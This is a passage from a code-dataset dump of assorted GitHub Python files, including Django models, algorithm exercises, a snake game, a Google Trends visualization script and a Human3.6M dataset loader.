lang\n rdfValue = rdflib.term.Literal(unicode(label), **subject_args)\n return[(rdflib.term.URIRef(self.uri), rdfPred, rdfValue)]\n\n def prefLabel_mapping_reverse(self, g, rdfPred, djF, lang=None):\n value = list(g.objects(rdflib.term.URIRef(self.uri), rdfPred))\n title = list(g.objects(rdflib.term.URIRef(self.uri), settings.NS.legal.legalName))\n if value == title:\n setattr(self, 'pref_label', PREFLABEL.TITLE)\n else:\n setattr(self, 'pref_label', PREFLABEL.ACRO)\n\n def exchange_mapping(self, rdfOffer, rdfSeek, lang=None):\n from coop.exchange.models import EWAY\n values = models.get_model('coop_local', 'exchange').objects.filter(organization=self)\n rdfSubject = rdflib.term.URIRef(self.uri)\n result = []\n for value in values:\n if value.eway == EWAY.OFFER:\n result.append((rdfSubject, rdfOffer, rdflib.term.URIRef(value.uri)))\n else:\n result.append((rdfSubject, rdfSeek, rdflib.term.URIRef(value.uri)))\n return result\n\n def exchange_mapping_reverse(self, g, rdfOffer, rdfSeek, lang=None):\n from coop.exchange.models import EWAY\n values = list(g.objects(rdflib.term.URIRef(self.uri), rdfOffer))\n exchangeModel = models.get_model('coop_local', 'exchange')\n for value in values:\n exists = exchangeModel.objects.filter(uri=str(value)).exists()\n if exists:\n ex = exchangeModel.objects.get(uri=str(value))\n ex.eway = EWAY.OFFER\n ex.organization = self\n ex.save()\n values = list(g.objects(rdflib.term.URIRef(self.uri), rdfSeek))\n for value in values:\n exists = exchangeModel.objects.filter(uri=str(value)).exists()\n if exists:\n ex = exchangeModel.objects.get(uri=str(value))\n ex.eway = EWAY.NEED\n ex.organization = self\n ex.save()\n\n\n# TODO : use django-multilingual-ng to translate the label field in multiple languages\n# Copied from OrgrelationType, goal is to use the same properties, as Project are Collaborations, a RDF subclass of project\n\n# class BaseCollaborationType(models.Model): # this model will be initialized with a fixture\n# label = models.CharField(_(u'label'), max_length=250)\n# uri = models.CharField(_(u'URI'), blank=True, max_length=250)\n\n# def __unicode__(self):\n# return self.label\n\n# class Meta:\n# verbose_name = _(u'Collaboration type')\n# verbose_name_plural = _(u'Collaboration types')\n# app_label = 'coop_local'\n\n\n\n\n","repo_name":"credis/django-coop","sub_path":"coop/org/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":35232,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"29870326293","text":"import math\n\nn = 524287\nk = 2\n# 524287,2\n\n\ndef changeBase(n, q):\n rev_base = ''\n while n > 0:\n n, mod = divmod(n, q)\n rev_base += str(mod)\n\n return rev_base[::-1]\n\n\ndef is_prime_number(x):\n if x == 1:\n return False\n for i in range(2,int(x**0.5)+1):\n if x % i == 0:\n return False # 소수가 아님\n return True # 소수임\n\n\n\na = changeBase(n,k)\nprint(a)\n\nzeros = []\nanswer = 0\nt = \"\"\nfor i in range(len(a)):\n if a[i] == \"0\":\n if len(zeros) == 0:\n if is_prime_number(int(a[:i])):\n answer += 1\n # print(\"zz\")\n t = \"\"\n zeros.append(i)\n else:\n print(t,i)\n if len(t) > 0:\n if is_prime_number(int(t)):\n answer += 1\n # print(\"bb\", t)\n t = \"\"\n zeros.append(i)\n else:\n t = t + a[i]\n\nprint(\"b\")\nif len(t) > 0:\n if is_prime_number(int(t)):\n answer += 1\n# print(\"b\")\nprint(answer)","repo_name":"yleer/BackjoonAlgoStudy2022","sub_path":"Programmers/k 진수 소수 구하기.py","file_name":"k 진수 소수 구하기.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3638845092","text":"# CSC 242-503\r\n# Assignment 7 \r\n\r\n# Patrick Krebs\r\n# I worked a little bit with Darian on this assignment. We didn't share any code\r\n# but a couple of times we talked through the bigger picture ideas behind\r\n# a couple of questions and talked through our approaches to the solutions.\r\n\r\nimport os\r\n\r\n# Question 1\r\ndef recListSum(lst):\r\n 'returns the sum of the numbers in the list.'\r\n if len(lst) == 0:\r\n return 0\r\n else:\r\n if type(lst[0]) == list:\r\n return recListSum(lst[0]) + recListSum(lst[1:])\r\n elif type(lst[0]) == int or type(lst[0]) == float:\r\n return lst[0] + recListSum(lst[1:])\r\n else:\r\n return 0 + recListSum(lst[1:])\r\n\r\n\r\n# Question 2\r\ndef depthCount(lst):\r\n 'returns the maximum depth to which the list has nested sublists'\r\n if lst == []:\r\n return 0\r\n elif type(lst[0]) == list:\r\n f = depthCount(lst[0]) + 1 # we stripped it out of a list\r\n r = depthCount(lst[1:])\r\n if f > r: # f is more deeply nested\r\n return f\r\n else: # r is more deeptly nested\r\n return r\r\n else: # lst[0] is not a list\r\n return depthCount(lst[1:])\r\n \r\n\r\n\r\n \r\n# Question 3\r\ndef search(fname, path):\r\n '''searches for the file in the folder and any folder contained within it,\r\n directly or indirectly.'''\r\n for item in os.listdir(path):\r\n if item[0] != '.':\r\n n = os.path.join(path, item)\r\n if os.path.isfile(n):\r\n if item == fname:\r\n return n\r\n elif os.path.isdir(n):\r\n result = search(fname, n)\r\n if result != None:\r\n return result \r\n return None\r\n \r\n \r\n\r\n# Question 4\r\ndef fileCount(path):\r\n 'returns the number of files found in the directory and any subdirectories'\r\n count = 0 \r\n for item in os.listdir(path):\r\n if item[0] != '.':\r\n n = os.path.join(path, item)\r\n if os.path.isfile(n):\r\n count += 1 \r\n elif os.path.isdir(n):\r\n count += fileCount(n)\r\n return count \r\n \r\n \r\n","repo_name":"asccharania/learning","sub_path":"python/csc242hw7.py","file_name":"csc242hw7.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10077413890","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 15 14:30:21 2023\r\nRepository : https://github.com/carolinacorral/trendsnplaces\r\n\r\n@author: Carolina Corral \r\n\r\n\"\"\"\r\n\r\nfrom pytrends.request import TrendReq\r\nimport pandas as pd\r\nimport requests\r\nfrom adjustText import adjust_text\r\nfrom geopy.geocoders import Nominatim\r\nimport time \r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.backends.backend_pdf as pdf\r\n\r\npytrend = TrendReq()\r\n# specify the keyword, geo code, and time frame (optional)\r\nkeyword = 'dog park' \r\ngeo = 'US-CA'\r\n\r\n# Replace YOUR_API_KEY with your actual API key\r\nAPI_KEY = 'YOUR_API_KEY'\r\n\r\n# Build the payload\r\npytrend.build_payload(kw_list=[keyword], geo=geo)\r\n\r\n# Retrieve the interest over time data and store it in a DataFrame\r\ninterest_df = pytrend.interest_by_region() \r\n\r\nloc_df = interest_df.reset_index(drop=False)\r\n\r\n\r\n# Function to get the latitude and longitude of a location using geopy\r\ndef get_lat_long(location):\r\n # Use geopy to get the latitude and longitude of the given location\r\n geolocator = Nominatim(user_agent=\"http\")\r\n location = geolocator.geocode(location,timeout=None)\r\n if location is not None:\r\n return (location.latitude, location.longitude)\r\n else:\r\n return (None, None)\r\n\r\n\r\n# Add two new columns to the dataframe for the latitude and longitude values\r\nloc_df['latitude'] = 0.0\r\nloc_df['longitude'] = 0.0\r\n\r\n# Loop through each row in the dataframe\r\nfor index, row in loc_df.iterrows():\r\n # Get the latitude and longitude of the current row's geoName using geopy\r\n location = row['geoName']\r\n lat, long = get_lat_long(location)\r\n \r\n # Update the latitude and longitude values in the dataframe\r\n loc_df.at[index, 'latitude'] = lat\r\n loc_df.at[index, 'longitude'] = long\r\n \r\n #Function to get number of results\r\ndef get_num_results(latitude, longitude):\r\n if latitude is None or longitude is None:\r\n return None\r\n \r\n \r\n params = {\r\n 'key': API_KEY,\r\n 'query': keyword, \r\n 'location': f'{latitude},{longitude}',\r\n 'radius': 10, #Desired radius\r\n 'minrating': 3, # minimum rating score\r\n }\r\n\r\n \r\n # Send a GET request to the Places API\r\n response = requests.get('https://maps.googleapis.com/maps/api/place/nearbysearch/json', params=params)\r\n\r\n # Retrieve the number of places returned by the search\r\n results = response.json()\r\n num_places = len(results['results'])\r\n\r\n #Loop to retrieve more results if there are more than 20 available\r\n while 'next_page_token' in results:\r\n \r\n time.sleep(2)\r\n\r\n params['pagetoken'] = results['next_page_token']\r\n\r\n # Send a GET request to the Places API to fetch the next page of results\r\n response = requests.get('https://maps.googleapis.com/maps/api/place/nearbysearch/json', params=params)\r\n\r\n # Retrieve the number of places returned by the search\r\n results = response.json()\r\n num_places += len(results['results'])\r\n\r\n\r\n return num_places\r\n\r\n# Create an empty dataframe to store the results\r\nresults_df = pd.DataFrame(columns=['geoName', 'num_results'])\r\n\r\n# Loop through each row in the dataframe and get the number of search results\r\nfor index, row in loc_df.iterrows():\r\n \r\n latitude = row['latitude']\r\n longitude = row['longitude']\r\n\r\n \r\n num_results = get_num_results(latitude, longitude) \r\n\r\n # Add the location name and number of search results to the results dataframe\r\n results_df.loc[index] = [row['geoName'], num_results]\r\n\r\n\r\n# Find the maximum value of \"num_results\"\r\nmax_num_results = results_df['num_results'].max()\r\n\r\n# Calculate the percentages\r\nresults_df['percentage'] = (results_df['num_results'] / max_num_results) * 100\r\n\r\n\r\n# Merge the 'num_results' column from results_df into loc_df based on 'geoName'\r\nmerged_df = loc_df.merge(results_df[['geoName', 'num_results']], on='geoName')\r\n\r\nmerged_df = merged_df[merged_df[keyword] != 0]\r\n\r\n# Calculate the division between 'num_results' and 'chiropractor' \r\nmerged_df['division'] = merged_df.apply(lambda row: round(row['num_results'] / row[keyword], 2), axis=1)\r\n\r\n\r\n# Create a heat map using seaborn\r\nheat_map = plt.figure(figsize=(12, 8))\r\nsns.heatmap(merged_df.pivot(index='geoName', columns='division', values='division'),\r\n cmap='RdYlGn', vmin=0, vmax=merged_df['division'].max(), annot=True, fmt='.2f')\r\n\r\nplt.title('Relation between interest and availability')\r\nplt.xlabel('Number of results to popularity ratio')\r\nplt.ylabel('City Name')\r\n\r\nsct = plt.figure(figsize=(12,8))\r\nplt.scatter(merged_df[keyword], merged_df['num_results'])\r\nplt.xlabel('Interest')\r\nplt.ylabel('Number of places')\r\nplt.title('Interest vs Availability')\r\nlabels= []\r\nfor i, row in merged_df.iterrows():\r\n x_val = row[keyword]\r\n y_val = row['num_results']\r\n label = row['geoName']\r\n text = plt.text(x_val, y_val, label, ha='left', va='bottom')\r\n labels.append(text)\r\n \r\nadjust_text(labels, arrowprops=dict(arrowstyle='-', color='gray'))\r\n\r\nsct_no_name = plt.figure(figsize=(12,8))\r\nplt.scatter(merged_df[keyword], merged_df['num_results'])\r\nplt.xlabel('Interest')\r\nplt.ylabel('Number of places')\r\nplt.title('Interest vs Availability')\r\n\r\n\r\n# Sort the dataframe by interest value in descending order\r\nsorted_by_interest = merged_df.sort_values(keyword, ascending=False)\r\n\r\n# Sort the dataframe by num_places value in descending order\r\nsorted_by_num_places = merged_df.sort_values('num_results', ascending=False)\r\n\r\n# Histogram of interest values\r\ninterest_rank = plt.figure(figsize=(10,6))\r\nplt.barh(sorted_by_interest['geoName'], sorted_by_interest[keyword])\r\nplt.xlabel('Place',wrap=True)\r\nplt.ylabel('Interest Value')\r\nplt.title('Places Ranked by Interest')\r\nplt.xticks(rotation=90)\r\n\r\n# Histogram of num_places values\r\nnums_rank = plt.figure(figsize=(10,6))\r\nplt.barh(sorted_by_num_places['geoName'], sorted_by_num_places['num_results'])\r\nplt.xlabel('Place',wrap=True)\r\nplt.ylabel('Number of Places')\r\nplt.title('Places Ranked by Number of Results')\r\nplt.xticks(rotation=90)\r\n\r\n# Create a PDF object\r\npdf_file = pdf.PdfPages('C:/Users/Carolina/proyc/metodos/trends/results/results.pdf')\r\n\r\n# Add each plot to the PDF file\r\npdf_file.savefig(sct, bbox_inches='tight')\r\npdf_file.savefig(sct_no_name, bbox_inches='tight')\r\npdf_file.savefig(interest_rank, bbox_inches='tight')\r\npdf_file.savefig(nums_rank, bbox_inches='tight')\r\n# Add more plots as needed\r\n\r\n# Close the PDF file\r\npdf_file.close()\r\n\r\n","repo_name":"carolinacorral/trendsnplaces","sub_path":"interest_visualization.py","file_name":"interest_visualization.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71595820003","text":"from h2o_wave import ui, Q, data\n\nfrom src.utils import (\n get_method_level_rules,\n get_class_level_rules,\n get_code_file,\n get_example_code_choices\n)\n\n\ndef header_card(q: Q):\n return ui.header_card(\n box='header',\n title=q.app.toml['App']['Title'],\n subtitle=f\"{q.app.toml['App']['Description']}\",\n icon=\"Broom\",\n items=[\n ui.persona(title='Guest User', initials_color=\"#000000\", initials='G', size='xs'),\n ]\n )\n\n\ndef chat_card():\n return ui.chatbot_card(\n box=\"body_right\",\n name=\"chatbot\",\n placeholder=\"Ready to untangle Python code? Ask away - I'm on a clean code mission!\",\n data=data('content from_user', t='list', rows=[]),\n )\n\n\ndef user_code_card(q):\n return ui.form_card(\n box=\"top_left\",\n items=[\n ui.textbox(\n name=\"user_code\",\n label=\"Insert your code here!\",\n width=\"100%\",\n height=\"200px\",\n multiline=True,\n value=get_code_file(q.client.example_code) if q.client.example_code is not None else None,\n ),\n ui.inline(\n items=[\n ui.dropdown(\n name=\"example_code\",\n label=\"Or pick an example!\",\n trigger=True,\n width=\"200px\",\n choices=get_example_code_choices(),\n value=q.client.example_code\n ),\n ]\n ),\n ]\n )\n\n\ndef checklist_card(q):\n return ui.form_card(\n box=\"bottom_left\",\n items=[\n ui.separator(label=\"Code Quality Checklist\"),\n ui.text(\"\"),\n ui.inline(\n items=[\n ui.checklist(\n name=\"method_level_checks\",\n label=\"Method level\",\n choices=get_method_level_rules(),\n values=q.client.method_level_checks\n ),\n ui.checklist(\n name=\"class_level_checks\",\n label=\"Class level\",\n choices=get_class_level_rules(),\n values=q.client.class_level_checks\n )\n ]\n ),\n ui.button(\n name=\"inspect_code\",\n label=\"Analyze Code\",\n ),\n ]\n )\n\n\ndef response_card():\n return ui.form_card(\n box=\"body_right\",\n items=[\n ui.text(content='')\n ]\n )\n\n\ndef footer_card():\n return ui.footer_card(\n box='footer',\n caption='Made with 💛 and [H2O Wave](https://wave.h2o.ai).'\n )\n\n\ndef device_not_supported_card():\n return ui.form_card(\n box='device-not-supported',\n items=[\n ui.text_xl(\n 'This app was built desktop; it is not available on mobile or tablets.'\n )\n ],\n )","repo_name":"h2oai/genai-app-store-apps","sub_path":"python-code-inspector/src/cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"38288269665","text":"import sys\n\ninput = sys.stdin.readline\nn,m = map(int, input().split())\narr = [int(input()) for _ in range(n)]\n\nstart = 0\nend = max(arr) * m\nresult = 0\n\nwhile start <= end:\n mid = (start + end) // 2\n total = 0\n \n for i in arr:\n total += mid//i\n \n if total >= m:\n end = mid - 1\n result = mid\n else:\n start = mid + 1\n\nprint(result)","repo_name":"ProblemSolveStudy/Kyung_mo","sub_path":"Baekjoon/B_3079.py","file_name":"B_3079.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21292193431","text":"#枚举\nli = [\"a\", \"b\", \"c\", \"d\"]\nstr1 = \"abcd\"\ndc = {1:1, 2:2, 3:3, 4:4}\n\nfor x, y in enumerate(li):\n print(x, y)\n\nfor x, y in enumerate(str1, 2):\n print(x, y)\n\nfor x in enumerate(dc, 3):\n print(x)","repo_name":"circularring1059/python","sub_path":"function/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"45372793669","text":"\"\"\"Devices.\"\"\"\n\nimport asyncio\nfrom typing import Any, Coroutine\n\nfrom src.deconz import Websocket\nfrom src.deconz import sensors\nfrom src.yeelight import Bulb\nfrom src.base import logic\nfrom src.utils.logger import LoggerLevel, get_logger\n\nlogger = get_logger(__name__, LoggerLevel.INFO)\n\ntasks1: list[Coroutine[Any, Any, None]] = []\n\ndeconz_ws = Websocket()\nsensor_open_close = sensors.OpenClose(\n \"Датчик открытия\",\n 2,\n deconz_ws,\n atasks=tasks1,\n)\nsensor_presence = sensors.Presence(\n \"Датчик присутствия\",\n 3,\n deconz_ws,\n atasks=tasks1,\n update_rate=1,\n)\nsensor_light_level = sensors.LightLevel(\n \"Уровень освещенности\",\n 4,\n deconz_ws,\n atasks=tasks1,\n)\nbulb = Bulb(\"192.168.101.20\", atasks=tasks1)\nsensor_humidity = sensors.Humidity(\n \"Датчик влажности\",\n 11,\n deconz_ws,\n atasks=tasks1,\n)\nsensor_temperature = sensors.ZHATemperature(\n \"Датчик температуры\",\n 12,\n deconz_ws,\n atasks=tasks1,\n)\nsensor_pressure = sensors.ZHAPressure(\n \"Датчик давления\",\n 13,\n deconz_ws,\n atasks=tasks1,\n)\n\n\nasync def _run() -> None:\n pos_front = logic.PosFront()\n neg_front = logic.NegFront()\n while True:\n presence = await sensor_presence.presence()\n if pos_front(presence).value:\n bulb.data.power.write(True, duration=1000)\n if neg_front(presence).value:\n bulb.data.power.write(False, duration=10000)\n await asyncio.sleep(0)\n\n\ntasks = [\n deconz_ws.task(),\n _run(),\n]\n\ntasks.extend(tasks1)\n","repo_name":"Konstantin-Dudersky/smarthome","sub_path":"server/src/devices/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39003793646","text":"# Author: Runar Fosse\n# Time complexity: O(log n)\n# Space complexity: O(1)\n\nclass Solution:\n def hammingWeight(self, n: int) -> int:\n # Using bit manipulation\n ones = 0\n while n:\n if n & 1:\n ones += 1\n n >>= 1\n \n return ones","repo_name":"RunarFosse/leetcode","sub_path":"Easy/number-of-1-bits.py","file_name":"number-of-1-bits.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5685128159","text":"from random import choice\nfrom itertools import product\nfrom os import system\nfrom time import sleep\nfrom pynput.keyboard import Listener, Key\n\n\nKEY_TO_DIRECTION = {\n Key.up : 'up',\n Key.down : 'down',\n Key.left : 'left',\n Key.right : 'right'\n}\n\nclass SnakeCollisionError(Exception):\n pass\n\nclass SnakeEndCondition(Exception):\n pass\n\nclass Snake():\n def __init__(self):\n rows = []\n for _ in range(10):\n row = ['.'] * 10\n rows.append(row)\n self.rows = rows\n self.snake = [(5, 5), (5, 4), (5, 3), (5, 2)]\n self.food_cords = (3, 3)\n self.direction = 'left'\n self.last_direction = 'left'\n self.all_board_cords = set(product(range(10), range(10)))\n\n def set_direction(self, direction):\n self.direction = direction\n\n def draw_food(self):\n x, y = self.food_cords\n self.rows[x][y] = 'o'\n\n def get_empty_board_cords(self):\n snake_cords = set(self.snake)\n return self.all_board_cords.difference(snake_cords)\n\n def empty_grid(self):\n for row in self.rows:\n for n in range(len(row)):\n row[n] = '.'\n\n def put_snake_in_rows(self):\n for x, y in self.snake:\n self.rows[x][y] = 'x'\n\n def move_snake(self):\n if not self.is_next_turn_valid():\n self.direction = self.last_direction\n \n snake_head = self.snake[-1]\n next_vector = self.get_next_vector()\n next_snake_head = (\n next_vector[0] + snake_head[0], next_vector[1] + snake_head[1])\n if next_snake_head == self.food_cords:\n if len(self.snake) == 99:\n raise SnakeEndCondition\n self.food_cords = choice(list(self.get_empty_board_cords()))\n else:\n self.snake.pop(0)\n if self.check_wall_collision(next_snake_head):\n raise SnakeCollisionError\n if self.check_self_collision(next_snake_head):\n raise SnakeCollisionError\n self.snake.append(next_snake_head)\n self.last_direction = self.direction\n\n def is_next_turn_valid(self):\n opposite_direction = {\n 'up': 'down',\n 'down': 'up',\n 'left': 'right',\n 'right': 'left',\n }\n return self.last_direction != opposite_direction[self.direction]\n\n def check_wall_collision(self, cords):\n if cords[0] < 0 or cords[0] > 9:\n return True\n if cords[1] < 0 or cords[1] > 9:\n return True\n return False\n\n def check_self_collision(self, cords):\n return cords in self.snake\n\n def get_next_vector(self):\n key_dict = {\n 'up': (-1, 0),\n 'down': (1, 0),\n 'left': (0, -1),\n 'right': (0, 1),\n }\n return key_dict[self.direction]\n\n def print_board(self):\n self.empty_grid()\n self.put_snake_in_rows()\n self.draw_food()\n for row in self.rows:\n print(*row)\n\n\ndef on_press_for_snake(snake):\n def on_press(key):\n if key == Key.esc:\n return False\n pressed_direction = KEY_TO_DIRECTION.get(key)\n if pressed_direction is not None:\n snake.set_direction(pressed_direction)\n return on_press\n\n\nif __name__ == \"__main__\":\n snake = Snake()\n with Listener(on_press=on_press_for_snake(snake)) as listener:\n try:\n while True:\n snake.print_board()\n sleep(0.5)\n system('cls')\n snake.move_snake()\n except SnakeEndCondition:\n print('You win!')\n except IndexError:\n print('You loose!')\n except SnakeCollisionError:\n print('You colided with something! You loose.')\n","repo_name":"Gu234/snake-exercise","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72826271522","text":"import os\n\nimport numpy as np\nimport cdflib\n\nfrom .datasetloader import DatasetLoader\n\n\nclass Human36M(DatasetLoader):\n \"\"\"\n Human 3.6M Dataset\n http://vision.imar.ro/human3.6m/description.php\n \"\"\"\n landmarks = [\n \"not used\", # 0 pelvis - near identical with 11 - NOT USED\n \"left hip\", # 1\n \"left knee\", # 2\n \"left ankle\", # 3\n \"left foot\", # 4\n \"left small toe\", # 5\n \"right hip\", # 6\n \"right knee\", # 7\n \"right ankle\", # 8\n \"right foot\", # 9\n \"right small toe\", # 10\n \"pelvis\", # 11\n \"mid torso\", # 12\n \"neck\", # 13\n \"nose\", # 14\n \"head top\", # 15\n \"not used\", # 16 neck - identical with 13 & 24 - NOT USED\n \"left shoulder\", # 17\n \"left elbow\", # 18\n \"left wrist\", # 19\n \"not used\", # 20 left wrist - identical with 19 - NOT USED\n \"left thumb\", # 21\n \"left handtip\", # 22\n \"not used\", # 23 left hand tip - identical with 22 - NOT USED\n \"not used\", # 24 - neck - identical with 13 & 16 - NOT USED\n \"right shoulder\", # 25\n \"right elbow\", # 26\n \"right wrist\", # 27\n \"not used\", # 28 right wrist - identical with 27 - NOT USED\n \"right thumb\", # 29\n \"right handtip\", # 30\n \"not used\", # 31 right hand tip - identical with 30 - NOT USED\n ]\n\n actions = [\n \"directions\", \"discussion\", \"eating\", \"greeting\", \"phoning\", \"posing\",\n \"purchases\", \"sitting\", \"sittingdown\", \"smoking\", \"photo\", \"waiting\",\n \"walking\", \"walkdog\", \"walktogether\"\n ]\n\n splits = [\"default\"]\n\n def __init__(self, data_path, **kwargs):\n \"\"\"\n Parameters\n ----------\n data_path : string\n folder with dataset on disk\n \"\"\"\n\n self._data_cols = [\n \"video-filenames\",\n \"keypoint2D-filenames\",\n \"keypoint3D-filename\",\n \"keypoint3D-mono-filenames\",\n \"keypoint3D-mono-universal-filenames\",\n \"keypoints2D\",\n \"keypoints3D\",\n \"keypoints3D-mono\",\n \"keypoints3D-mono-universal\",\n \"action\",\n # The dataset also contains other data, to be implemented if/when needed\n ]\n self._data = {\n \"video-filenames\": [],\n \"keypoint2D-filenames\": [],\n \"keypoint3D-filename\": [],\n \"keypoint3D-mono-filenames\": [],\n \"keypoint3D-mono-universal-filenames\": [],\n \"action\": [],\n # The dataset also contains other data, to be implemented if/when needed\n }\n self._splits = {\n split: {\n \"train\": [],\n \"test\": []\n }\n for split in Human36M.splits\n }\n\n self._length = 0\n for subject_id in range(1, 11):\n if os.path.exists(os.path.join(data_path, \"S\" + str(subject_id))):\n keypoint_folder = os.path.join(data_path,\n \"S\" + str(subject_id),\n \"MyPoseFeatures\")\n for filename in os.listdir(\n os.path.join(keypoint_folder, 'D3_Positions')):\n if filename.startswith(\".\"):\n continue\n # chop of file ending, leave dot on\n # find will give location of \" \" if exists (\"Action X.cfd\")\n # otw (\"Action.cdf\") find will return -1 and we chop off the dot we left\n # on previously\n action = filename[:-3]\n action = action[:action.find(\" \")].lower()\n if subject_id == 11 and action == 'directions':\n continue # Discard corrupted video\n self._data[\"keypoint3D-filename\"].append(\n os.path.join(keypoint_folder, \"D3_positions\",\n filename))\n # some actions are named inconsitently, fix names\n if action == \"takingphoto\":\n action = \"photo\"\n elif action == \"walkingdog\":\n action = \"walkdog\"\n self._data[\"action\"].append(Human36M.actions.index(action))\n base_filename = filename[:-4]\n\n video_filenames = []\n keypoint2D_filenames = []\n keypoint3D_mono_filenames = []\n keypoint3D_mono_universal_filenames = []\n for d2_filename in os.listdir(\n os.path.join(keypoint_folder, 'D2_Positions')):\n # skip hidden files and files of oother actions\n if (d2_filename.startswith(\".\")\n or not d2_filename.startswith(base_filename)):\n continue\n # filenames can b of the form \"Action.cam_name.cdf\" or\"Action X.cam_name.cdf\"\n # need to avoid false matches of Action.cam_name for action X.cam_name\n if d2_filename[len(base_filename):len(base_filename) +\n 1] != \".\":\n continue\n # filenames here are of the structure \"base_filename.cam_name.cdf\"\n # the same is true for other corresponding files so add all of them\n # to the respective lists\n cam_name = d2_filename[len(base_filename) + 1:-4]\n keypoint2D_filenames.append(\n os.path.join(keypoint_folder, \"D2_Positions\",\n d2_filename))\n keypoint3D_mono_filenames.append(\n os.path.join(\n keypoint_folder, \"D3_Positions_mono\",\n base_filename + \".\" + cam_name + \".cdf\"))\n keypoint3D_mono_universal_filenames.append(\n os.path.join(\n keypoint_folder, \"D3_Positions_mono_universal\",\n base_filename + \".\" + cam_name + \".cdf\"))\n video_filenames.append(\n os.path.join(\n data_path, \"S\" + str(subject_id), \"Videos\",\n base_filename + \".\" + cam_name + \".mp4\"))\n\n self._data[\"video-filenames\"].append(video_filenames)\n self._data[\"keypoint2D-filenames\"].append(\n keypoint2D_filenames)\n self._data[\"keypoint3D-mono-filenames\"].append(\n keypoint3D_mono_filenames)\n self._data[\"keypoint3D-mono-universal-filenames\"].append(\n keypoint3D_mono_universal_filenames)\n self._length += 1\n super().__init__(**kwargs)\n\n def load_keypointfile(self, filename):\n \"\"\"\n Load the keypoints sequence from the given file.\n\n Parameters\n ----------\n filename : string\n Filename of the file containing a skeleton sequence\n \"\"\"\n # print(filename)\n cdf_file = cdflib.CDF(filename)\n keypoints = cdf_file.varget(\"Pose\", expand=False)[0]\n if keypoints.shape[-1] == 64: # 2D\n keypoints = keypoints.reshape(-1, 32, 2)\n elif keypoints.shape[-1] == 96: # 3D\n keypoints = keypoints.reshape(-1, 32, 3)\n if filename.find(\"mono\") > 0:\n keypoints[:, :, 1] *= -1\n else:\n keypoints = keypoints[:, :, (0, 2, 1)]\n return np.array(keypoints)\n\n def __getitem__(self, index):\n \"\"\"\n Indexing access to the dataset.\n\n Returns a dictionary of all currently selected data columns of the\n selected item.\n \"\"\"\n data = super().__getitem__(index)\n # super() provides all non-lazy access, only need to do more for data\n # that hasn't been loaded previously\n missing_cols = self._selected_cols - data.keys()\n if len(missing_cols) > 0:\n for col in missing_cols:\n if col.startswith(\"keypoints\"):\n if col == \"keypoints3D\":\n data[\"keypoints3D\"] = self.load_keypointfile(\n self._data[\"keypoint3D-filename\"][index])\n else:\n filename_index = \"keypoint\" + col[9:] + \"-filenames\"\n data[col] = []\n for filename in self._data[filename_index][index]:\n data[col].append(self.load_keypointfile(filename))\n return data\n","repo_name":"kschlegel/DatasetLoader","sub_path":"datasetloader/human36m.py","file_name":"human36m.py","file_ext":"py","file_size_in_byte":8919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5201761934","text":"__author__ = 'Bertrand'\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom league_manager.models.ref_roster import Ref_Roster\nfrom league_manager.models.ref_skills import Ref_Skills\nfrom league_manager.models.ref_roster_line import Ref_Roster_Line\n\nclass Command(BaseCommand):\n help = 'Show lrb6 roster details'\n\n def handle(self, *args, **options):\n roster_list = Ref_Roster.objects.all()\n\n for roster in roster_list:\n print (\"=====================================================================\")\n print (roster.name)\n print (\"Reroll :\"+str(roster.reroll_price)+ \" pO\")\n print ('---------------------------------------------------------------------')\n roster_lines = Ref_Roster_Line.objects.filter(roster=roster)\n for line in roster_lines:\n skills = line.base_skills;\n print()\n print(str(line.max) +\" \"+line.position+ \" \"+str(line.cost)+\" \"+str(line.M)+\" \"+str(line.F)+\" \"+str(line.Ag)+\" \"+str(line.Ar)+\" \".join([skill.name for skill in skills.all()])+\" \"+line.normal_skills+\" \"+line.double_skills)\n\n\n self.stdout.write(self.style.SUCCESS('Et voilà !\"'))","repo_name":"BBegouin/BBClub","sub_path":"league_manager/management/commands/create_team.py","file_name":"create_team.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71577862561","text":"from django.contrib import messages\nfrom django.shortcuts import get_object_or_404, redirect\nfrom apps.vendas.models import Venda, Produto_Venda\n\n\ndef deleta_venda(request, venda_id):\n\n '''Autenticando o acesso a pagina'''\n\n if not request.user.is_authenticated:\n return redirect('login')\n\n ''' Pegando o usuario do banco de dados pela primary key '''\n\n venda = get_object_or_404(Venda, pk=venda_id)\n\n ''' Pegando a lista de produtos da tabela auxiliar '''\n lista_produtos = Produto_Venda.objects.order_by('venda_id')\n\n ''' Filtrando os produtos, deixando só os compativeis com o id da venda '''\n lista_produtos = lista_produtos.filter(venda_id=venda_id)\n\n ''' Deletando os itens da venda do banco de dados '''\n lista_produtos.delete()\n\n ''' 